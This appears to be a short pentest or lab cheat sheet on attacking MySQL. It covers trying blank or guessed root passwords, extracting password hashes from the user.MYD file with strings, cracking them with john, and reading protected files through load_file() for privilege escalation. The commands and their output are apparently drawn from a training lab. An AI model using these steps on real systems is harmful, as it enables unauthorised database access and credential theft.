# MySql

## Easy to Try

* Sometimes people leave NO password or easy to guess.

```
su mysql        .. sometimes an actual user
mysql -u root   .. see if you can get into mysql easily
                .. easy guess 'mysql' password!!     
```

## Navigate

```
show databases;
use [DATABASE];
show tables;
select * from [TABLE];
```

## Strings MYD

```
> strings /var/lib/mysql/mysql/user.MYD   ..might get you a password 

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

..
Stitch the two together:
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  ..cracked!
```

## PrivEsc

```
Privesc to read a file you shouldnt have access to!
Some of this is locked down in later releases of mysql, but worth checking!!

>> mysql -u root
>> select load_file('/var/lib/mysql-files/key.txt');
+-------------------------------------------+
| load_file('/var/lib/mysql-files/key.txt') |
+-------------------------------------------+
| 4234db90-01c6-4f10-8c81-8c0017107fc7
```